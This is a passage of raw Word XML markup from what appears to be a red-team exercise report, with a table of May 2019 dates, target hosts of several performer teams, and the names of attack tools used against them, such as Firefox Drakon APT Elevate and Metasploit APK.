      <w:r w:rsidR="00CE2C66" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">All three of the hosts from each of the performers were </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>homogeneous.</w:t>
      </w:r>
      <w:r w:rsidR="00CE2C66" w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  Attacks against the performers were randomly selected by TA5.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4896BA" w14:textId="77777777" w:rsidR="00DC723B" w:rsidRPr="00FC027E" w:rsidRDefault="00DC723B" w:rsidP="004D40AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>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2691"/>
        <w:gridCol w:w="3711"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="2CD217F0" w14:textId="77777777" w:rsidTr="006C3099">
        <w:trPr>
          <w:trHeight w:val="257"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="73D06E74" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="006C3099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="1E2A5C64" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="006C3099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:shd w:val="clear" w:color="000000" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="5A2732BB" w14:textId="77777777" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="006C3099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="4A3BF416" w14:textId="77777777" w:rsidTr="006C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567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12ED0A29" w14:textId="5F74B60A" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>8/201</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2AAB94AC" w14:textId="08C0E824" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>TA5.2</w:t>
            </w:r>
            <w:r w:rsidR="00CE2C66" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows1,2 and Ubuntu1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="137352CB" w14:textId="44324DA9" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Firefox Drakon APT Elevate, Copykatz Sysinfo, Firefox BITS Mircro APT, Firefox BinFMT-Elevate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="32D3618E" w14:textId="77777777" w:rsidTr="006C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1567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="790FCEA0" w14:textId="53E8BB50" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9/201</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E76B9C5" w14:textId="17841E93" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="004D40AC" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>FiveDirections</w:t>
            </w:r>
            <w:r w:rsidR="00CE2C66" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>1, Marple1,TA52 Ubuntu1, TA5.2 Windows 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5BC1BF43" w14:textId="3E625F21" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Firefox Drakon APT Elevate, Copykatz Sysinfo, Firefox BITS Mircro APT,</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="0A5FEF03" w14:textId="77777777" w:rsidTr="006C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67" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="725253DB" w14:textId="15F0A67B" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/1</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/201</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B67FF81" w14:textId="6C257C6F" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Multiple Performers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FC1D6F3" w14:textId="48C06C35" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Nmap SSH SCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="42199419" w14:textId="77777777" w:rsidTr="006C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67" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D610B8D" w14:textId="6F77DA9F" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>05/13/2019</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F04E250" w14:textId="3993126D" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>ClearScope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="696AD27A" w14:textId="79EA4A39" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Metasploit APK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="101A82D9" w14:textId="77777777" w:rsidTr="006C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67" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A534DA2" w14:textId="2CF73246" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/14/201</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18D635CB" w14:textId="12D956C4" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>TRACE2, THEIA, ClearScope1, THEIA3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6CDA5C79" w14:textId="5D5EC44B" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>FirefoxDrakonAPT Elevate inject, FirefoxDrakonAPT(failed), BarePhoneMicroAPT (failed), BenignActivity (BinFmt-Elevate Setup)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D40AC" w:rsidRPr="00FC027E" w14:paraId="3DF5D474" w14:textId="77777777" w:rsidTr="006C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67" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="641A8018" w14:textId="3E6E24C0" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidR="004D40AC" w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>/15/201</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2691" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67B0FA93" w14:textId="004EF4ED" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC027E">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>ClearScope1, FiveD2, ClearScope2, THEIA1, ClearScope2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3711" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B89BBC9" w14:textId="56420F21" w:rsidR="004D40AC" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="006C3099">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:rPr>
